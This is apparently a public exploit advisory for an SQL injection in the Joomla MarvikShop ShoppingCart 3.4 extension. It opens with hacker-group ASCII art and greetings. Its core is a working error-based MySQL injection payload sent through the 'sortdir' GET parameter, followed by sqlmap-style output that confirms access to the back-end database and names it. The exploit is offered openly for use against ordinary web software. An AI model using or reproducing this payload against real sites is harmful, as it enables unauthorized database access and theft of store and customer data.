Headline
Joomla MarvikShop ShoppingCart 3.4 SQL Injection
Joomla MarvikShop ShoppingCart extension version 3.4 suffers from a remote SQL injection vulnerability.
┌┌───────────────────────────────────────────────────────────────────────────────────────┐││ C r a C k E r ┌┘┌┘ T H E C R A C K O F E T E R N A L M I G H T ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ [ Exploits ] ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘: Author : CraCkEr :│ Website : extensions.joomla.org ││ Vendor : Team MarvikShop ││ Software : Joomla MarvikShop ShoppingCart 3.4 ││ Vuln Type: SQL Injection ││ Method : GET ││ Impact : Database Access ││ ││────────────────────────────────────────────────────────────────────────────────────────││ B4nks-NET irc.b4nks.tk #unix ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘: :│ Release Notes: ││ ═════════════ ││ Typically used for remotely exploitable vulnerabilities that can lead to ││ system compromise ││ ││ │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ © CraCkEr 2022 ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /en/index.phpGET parameter 'sortdir' is vulnerable---Parameter: sortdir (GET) Type: error-based Title: MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE) Payload: option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=desc,EXTRACTVALUE(9096,CONCAT(0x5c,0x7178787871,(SELECT (ELT(9096=9096,1))),0x7171626271))&limitstart=0&limit=25---[INFO] the back-end DBMS is MySQLweb application technology: Nginx, PHP 7.1.33back-end DBMS: MySQL >= 5.1 (MariaDB fork)[INFO] fetching current databasecurrent database: 'stenen_test'[-] Done